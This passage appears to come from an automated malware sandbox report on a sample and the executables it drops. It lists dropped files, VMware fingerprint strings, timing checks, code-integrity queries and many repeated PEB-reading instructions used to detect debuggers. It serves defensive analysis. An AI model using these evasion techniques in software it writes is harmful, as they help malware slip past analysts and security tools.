Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8746.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8E8B.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\89D7.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7428.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6DDE.exe Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A946B90 rdtsc 29_2_6A946B90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000007.00000000.286192637.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000007.00000000.286192637.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000007.00000000.302034474.0000000008C73000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.301288378.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.301288378.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000007.00000000.281934992.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.270521490.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000007.00000000.301288378.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000007.00000000.270521490.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000007.00000000.296961123.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: AdvancedRun.exe, 0000002A.00000002.494181317.0000000000799000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: explorer.exe, 00000007.00000000.264799560.0000000000F73000.00000004.00000020.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
Source: AdvancedRun.exe, 0000002A.00000002.494181317.0000000000799000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging:

barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97A5.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\cviueca System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\192F.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B5.exe System information queried: CodeIntegrityInformation
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 0_2_004267E0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_004267E0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 0_2_02E0E36A push dword ptr fs:[00000030h] 0_2_02E0E36A
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 19_2_02E7D4F2 push dword ptr fs:[00000030h] 19_2_02E7D4F2
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 22_2_02C70042 push dword ptr fs:[00000030h] 22_2_02C70042
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94D294 mov eax, dword ptr fs:[00000030h] 29_2_6A94D294
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94D294 mov eax, dword ptr fs:[00000030h] 29_2_6A94D294
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94DA88 mov eax, dword ptr fs:[00000030h] 29_2_6A94DA88
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94DA88 mov eax, dword ptr fs:[00000030h] 29_2_6A94DA88
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92AAB0 mov eax, dword ptr fs:[00000030h] 29_2_6A92AAB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92AAB0 mov eax, dword ptr fs:[00000030h] 29_2_6A92AAB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9412BD mov esi, dword ptr fs:[00000030h] 29_2_6A9412BD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9412BD mov eax, dword ptr fs:[00000030h] 29_2_6A9412BD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9412BD mov eax, dword ptr fs:[00000030h] 29_2_6A9412BD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A911AA0 mov eax, dword ptr fs:[00000030h] 29_2_6A911AA0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A945AA0 mov eax, dword ptr fs:[00000030h] 29_2_6A945AA0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A945AA0 mov eax, dword ptr fs:[00000030h] 29_2_6A945AA0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9152A5 mov eax, dword ptr fs:[00000030h] 29_2_6A9152A5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9152A5 mov eax, dword ptr fs:[00000030h] 29_2_6A9152A5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9152A5 mov eax, dword ptr fs:[00000030h] 29_2_6A9152A5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9152A5 mov eax, dword ptr fs:[00000030h] 29_2_6A9152A5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9152A5 mov eax, dword ptr fs:[00000030h] 29_2_6A9152A5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8ADD mov eax, dword ptr fs:[00000030h] 29_2_6A9E8ADD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915AC0 mov eax, dword ptr fs:[00000030h] 29_2_6A915AC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915AC0 mov eax, dword ptr fs:[00000030h] 29_2_6A915AC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915AC0 mov eax, dword ptr fs:[00000030h] 29_2_6A915AC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913ACA mov eax, dword ptr fs:[00000030h] 29_2_6A913ACA
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942ACB mov eax, dword ptr fs:[00000030h] 29_2_6A942ACB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942AE4 mov eax, dword ptr fs:[00000030h] 29_2_6A942AE4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 29_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 29_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 29_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 29_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 29_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 29_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 29_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 29_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 29_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 29_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 29_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 29_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 29_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 29_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915210 mov eax, dword ptr fs:[00000030h] 29_2_6A915210
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915210 mov ecx, dword ptr fs:[00000030h] 29_2_6A915210
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915210 mov eax, dword ptr fs:[00000030h] 29_2_6A915210
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915210 mov eax, dword ptr fs:[00000030h] 29_2_6A915210
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A933A1C mov eax, dword ptr fs:[00000030h] 29_2_6A933A1C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CD208 mov eax, dword ptr fs:[00000030h] 29_2_6A9CD208
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CD208 mov eax, dword ptr fs:[00000030h] 29_2_6A9CD208
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A928A0A mov eax, dword ptr fs:[00000030h] 29_2_6A928A0A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A918239 mov eax, dword ptr fs:[00000030h] 29_2_6A918239
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A918239 mov eax, dword ptr fs:[00000030h] 29_2_6A918239
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A918239 mov eax, dword ptr fs:[00000030h] 29_2_6A918239
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914A20 mov eax, dword ptr fs:[00000030h] 29_2_6A914A20
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914A20 mov eax, dword ptr fs:[00000030h] 29_2_6A914A20
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A99EA20 mov eax, dword ptr fs:[00000030h] 29_2_6A99EA20
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A229 mov eax, dword ptr fs:[00000030h] 29_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A229 mov eax, dword ptr fs:[00000030h] 29_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A229 mov eax, dword ptr fs:[00000030h] 29_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A229 mov eax, dword ptr fs:[00000030h] 29_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A229 mov eax, dword ptr fs:[00000030h] 29_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A229 mov eax, dword ptr fs:[00000030h] 29_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A229 mov eax, dword ptr fs:[00000030h] 29_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A229 mov eax, dword ptr fs:[00000030h] 29_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A229 mov eax, dword ptr fs:[00000030h] 29_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A4257 mov eax, dword ptr fs:[00000030h] 29_2_6A9A4257
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912240 mov ecx, dword ptr fs:[00000030h] 29_2_6A912240
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912240 mov eax, dword ptr fs:[00000030h] 29_2_6A912240
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A919240 mov eax, dword ptr fs:[00000030h] 29_2_6A919240
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A919240 mov eax, dword ptr fs:[00000030h] 29_2_6A919240
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A919240 mov eax, dword ptr fs:[00000030h] 29_2_6A919240
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A919240 mov eax, dword ptr fs:[00000030h] 29_2_6A919240
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A4248 mov eax, dword ptr fs:[00000030h] 29_2_6A9A4248
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95927A mov eax, dword ptr fs:[00000030h] 29_2_6A95927A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CB260 mov eax, dword ptr fs:[00000030h] 29_2_6A9CB260
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CB260 mov eax, dword ptr fs:[00000030h] 29_2_6A9CB260
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8A62 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8A62
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F395 mov eax, dword ptr fs:[00000030h] 29_2_6A91F395
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914B94 mov edi, dword ptr fs:[00000030h] 29_2_6A914B94
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9BEB8A mov ecx, dword ptr fs:[00000030h] 29_2_6A9BEB8A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9BEB8A mov eax, dword ptr fs:[00000030h] 29_2_6A9BEB8A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9BEB8A mov eax, dword ptr fs:[00000030h] 29_2_6A9BEB8A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9BEB8A mov eax, dword ptr fs:[00000030h] 29_2_6A9BEB8A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D138A mov eax, dword ptr fs:[00000030h] 29_2_6A9D138A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CD380 mov ecx, dword ptr fs:[00000030h] 29_2_6A9CD380
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E9BBE mov eax, dword ptr fs:[00000030h] 29_2_6A9E9BBE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8BB6 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8BB6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1BA8 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1BA8
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944BAD mov eax, dword ptr fs:[00000030h] 29_2_6A944BAD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944BAD mov eax, dword ptr fs:[00000030h] 29_2_6A944BAD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944BAD mov eax, dword ptr fs:[00000030h] 29_2_6A944BAD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9953CA mov eax, dword ptr fs:[00000030h] 29_2_6A9953CA
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9953CA mov eax, dword ptr fs:[00000030h] 29_2_6A9953CA
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A923BF4 mov eax, dword ptr fs:[00000030h] 29_2_6A923BF4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A923BF4 mov ecx, dword ptr fs:[00000030h] 29_2_6A923BF4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9123F6 mov eax, dword ptr fs:[00000030h] 29_2_6A9123F6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A911BE9 mov eax, dword ptr fs:[00000030h] 29_2_6A911BE9
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93DBE9 mov eax, dword ptr fs:[00000030h] 29_2_6A93DBE9
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C23E3 mov ecx, dword ptr fs:[00000030h] 29_2_6A9C23E3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C23E3 mov ecx, dword ptr fs:[00000030h] 29_2_6A9C23E3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C23E3 mov eax, dword ptr fs:[00000030h] 29_2_6A9C23E3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D131B mov eax, dword ptr fs:[00000030h] 29_2_6A9D131B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 mov eax, dword ptr fs:[00000030h] 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CE33D mov eax, dword ptr fs:[00000030h] 29_2_6A9CE33D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A4320 mov eax, dword ptr fs:[00000030h] 29_2_6A9A4320
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8B58 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8B58
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F358 mov eax, dword ptr fs:[00000030h] 29_2_6A91F358
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A943B5A mov eax, dword ptr fs:[00000030h] 29_2_6A943B5A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A943B5A mov eax, dword ptr fs:[00000030h] 29_2_6A943B5A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A943B5A mov eax, dword ptr fs:[00000030h] 29_2_6A943B5A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A943B5A mov eax, dword ptr fs:[00000030h] 29_2_6A943B5A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F340 mov eax, dword ptr fs:[00000030h] 29_2_6A91F340
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91DB40 mov eax, dword ptr fs:[00000030h] 29_2_6A91DB40
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A943B7A mov eax, dword ptr fs:[00000030h] 29_2_6A943B7A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A943B7A mov eax, dword ptr fs:[00000030h] 29_2_6A943B7A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A6365 mov eax, dword ptr fs:[00000030h] 29_2_6A9A6365
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A6365 mov eax, dword ptr fs:[00000030h] 29_2_6A9A6365
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A6365 mov eax, dword ptr fs:[00000030h] 29_2_6A9A6365
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913880 mov eax, dword ptr fs:[00000030h] 29_2_6A913880
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913880 mov eax, dword ptr fs:[00000030h] 29_2_6A913880
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91E8B0 mov eax, dword ptr fs:[00000030h] 29_2_6A91E8B0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91E8B0 mov eax, dword ptr fs:[00000030h] 29_2_6A91E8B0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91E8B0 mov eax, dword ptr fs:[00000030h] 29_2_6A91E8B0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91E8B0 mov eax, dword ptr fs:[00000030h] 29_2_6A91E8B0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91E8B0 mov eax, dword ptr fs:[00000030h] 29_2_6A91E8B0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91E8B0 mov eax, dword ptr fs:[00000030h] 29_2_6A91E8B0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94F0BF mov ecx, dword ptr fs:[00000030h] 29_2_6A94F0BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94F0BF mov eax, dword ptr fs:[00000030h] 29_2_6A94F0BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94F0BF mov eax, dword ptr fs:[00000030h] 29_2_6A94F0BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9238A4 mov eax, dword ptr fs:[00000030h] 29_2_6A9238A4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9238A4 mov ecx, dword ptr fs:[00000030h] 29_2_6A9238A4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9590AF mov eax, dword ptr fs:[00000030h] 29_2_6A9590AF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9228AE mov eax, dword ptr fs:[00000030h] 29_2_6A9228AE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9228AE mov eax, dword ptr fs:[00000030h] 29_2_6A9228AE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9228AE mov eax, dword ptr fs:[00000030h] 29_2_6A9228AE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9228AE mov ecx, dword ptr fs:[00000030h] 29_2_6A9228AE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9228AE mov eax, dword ptr fs:[00000030h] 29_2_6A9228AE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9228AE mov eax, dword ptr fs:[00000030h] 29_2_6A9228AE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9170C0 mov eax, dword ptr fs:[00000030h] 29_2_6A9170C0
